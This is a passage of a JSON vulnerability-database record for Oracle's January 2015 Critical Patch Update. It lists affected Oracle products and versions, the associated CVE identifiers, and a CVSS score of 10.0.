JRockit", "version": "8u25", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "MICROS Retail", "version": "5.5.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "10.1.3.4.2", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "10.1.3.4.2", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.2.2", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.5.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.4", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "4.x", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "11.1.1.7", "operator": "le"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.26", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Containers for J2EE", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.38", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.28", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "4", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "5.0u75", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "MICROS Retail", "version": "4.5.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "5.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Java SE", "version": "7u72", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.26", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.2.2", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.2.2", "operator": "le"}, {"name": "MICROS Retail", "version": "3.2.1", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5.33.0", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.1.1", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1119", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "MICROS Retail", "version": "6.5.2", "operator": "le"}, {"name": "PL/SQL", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.4", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.40", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.53", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u6", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.2.2", "operator": "le"}, {"name": "Integrated Lights Out Manager(ILOM)", "version": "3.2.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.0.2.0", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.0.1.0", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "7.0", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1.3", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.19", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.2", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "10.3.6.0", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.0.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2232", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.0", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.36", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.52", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.1", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "3.x", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Agile PLM for Process", "version": "6.1.0.3", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Application Object Library", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.2", "operator": "le"}, {"name": "MySQL Server", "version": "5.6.21", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.2", "operator": "le"}, {"name": "Solaris Cluster", "version": "3.3", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Directory Server Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.0.4", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Security Service", "version": "12.1.2", "operator": "le"}, {"name": "Recovery", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "2.x", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.5", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.2.1.0", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.2.2", "operator": "le"}, {"name": "PL/SQL", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.24", "operator": "le"}, {"name": "Solaris Cluster", "version": "4.1", "operator": "le"}, {"name": "Siebel Core - EAI", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "4.0.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.1", "operator": "le"}, {"name": "MICROS Retail", "version": "5.0.3", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "2.0.6.2.0", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.3", "operator": "le"}, {"name": "JD Edwards EnterpriseOne Tools", "version": "9.1.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.4", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.3", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.1.1", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.1.1", "operator": "le"}, {"name": "Oracle GlassFish Server", "version": "3.1.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Oracle WebLogic Portal", "version": "10.3.6.0", "operator": "le"}, {"name": "MICROS Retail", "version": "4.8.0", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.71", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Waveset", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.2", "operator": "le"}], "cvelist": ["CVE-2015-0388", "CVE-2014-6574", "CVE-2015-0390", "CVE-2011-4317", "CVE-2014-6592", "CVE-2014-3566", "CVE-2011-4461", "CVE-2015-0386", "CVE-2015-0425", "CVE-2014-6566", "CVE-2013-4784", "CVE-2014-0191", "CVE-2015-0365", "CVE-2014-6579", "CVE-2014-6556", "CVE-2014-0231", "CVE-2014-6571", "CVE-2015-0427", "CVE-2014-6578", "CVE-2015-0398", "CVE-2014-6510", "CVE-2014-6595", "CVE-2011-3607", "CVE-2014-6518", "CVE-2015-0385", "CVE-2015-0395", "CVE-2015-0368", "CVE-2013-6449", "CVE-2014-6575", "CVE-2015-0380", "CVE-2015-0424", "CVE-2003-0001", "CVE-2014-6565", "CVE-2015-0407", "CVE-2014-0076", "CVE-2015-0362", "CVE-2015-0430", "CVE-2014-6585", "CVE-2015-0410", "CVE-2013-5704", "CVE-2015-0402", "CVE-2015-0379", "CVE-2014-6548", "CVE-2015-0396", "CVE-2015-0422", "CVE-2015-0435", "CVE-2014-5704", "CVE-2013-5605", "CVE-2014-6584", "CVE-2014-0224", "CVE-2014-4259", "CVE-2015-0391", "CVE-2014-6567", "CVE-2015-0418", "CVE-2013-0338", "CVE-2014-6480", "CVE-2014-6576", "CVE-2015-0428", "CVE-2015-0431", "CVE-2014-0098", "CVE-2014-6549", "CVE-2015-0420", "CVE-2015-0432", "CVE-2015-0383", "CVE-2011-3389", "CVE-2013-1741", "CVE-2014-6583", "CVE-2014-6597", "CVE-2014-4279", "CVE-2004-0230", "CVE-2015-0369", "CVE-2014-6525", "CVE-2015-0372", "CVE-2014-6582", "CVE-2015-0378", "CVE-2015-0392", "CVE-2015-0416", "CVE-2014-6587", "CVE-2013-1740", "CVE-2013-6438", "CVE-2015-0406", "CVE-2015-0401", "CVE-2014-6569", "CVE-2014-3470", "CVE-2012-0053", "CVE-2013-1739", "CVE-2014-6599", "CVE-2014-1492", "CVE-2013-2877", "CVE-2015-0417", "CVE-2015-0404", "CVE-2013-6450", "CVE-2013-5606", "CVE-2014-0114", "CVE-2015-0364", "CVE-2014-0050", "CVE-2010-5107", "CVE-2011-3368", "CVE-2014-6573", "CVE-2014-1490", "CVE-2010-5298", "CVE-2013-4286", "CVE-2015-0371", "CVE-2014-6526", "CVE-2015-0382", "CVE-2014-1568", "CVE-2015-0363", "CVE-2014-6600", "CVE-2014-6580", "CVE-2014-6509", "CVE-2015-0375", "CVE-2015-0414", "CVE-2014-0195", "CVE-2015-0413", "CVE-2014-6593", "CVE-2014-0198", "CVE-2014-6601", "CVE-2014-6594", "CVE-2015-0373", "CVE-2015-0421", "CVE-2013-2186", "CVE-2014-3567", "CVE-2014-6581", "CVE-2014-0015", "CVE-2015-0403", "CVE-2014-6570", "CVE-2015-0408", "CVE-2015-0429", "CVE-2014-6596", "CVE-2014-6521", "CVE-2015-0374", "CVE-2014-6591", "CVE-2014-6586", "CVE-2014-6524", "CVE-2014-6572", "CVE-2015-0370", "CVE-2015-0412", "CVE-2015-0400", "CVE-2015-0409", "CVE-2015-0387", "CVE-2015-0389", "CVE-2015-0399", "CVE-2014-0118", "CVE-2015-0415", "CVE-2014-6590", "CVE-2015-0376", "CVE-2014-6481", "CVE-2015-0393", "CVE-2015-0366", "CVE-2015-0419", "CVE-2014-6568", "CVE-2015-0377", "CVE-2015-0394", "CVE-2015-0397", "CVE-2015-0384", "CVE-2014-6589", "CVE-2014-1491", "CVE-2014-6528", "CVE-2014-6588", "CVE-2014-6541", "CVE-2011-1944", "CVE-2015-0437", "CVE-2014-6514", "CVE-2014-0117", "CVE-2014-4212", "CVE-2015-0436", "CVE-2014-6598", "CVE-2015-0367", "CVE-2014-0226", "CVE-2013-1620", "CVE-2013-4545", "CVE-2015-0426", "CVE-2015-0434", "CVE-2014-0221", "CVE-2015-0411", "CVE-2015-0381", "CVE-2014-6577"], "modified": "2015-01-20T00:00:00", "id": "ORACLE:CPUJAN2015-1972971", "href": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
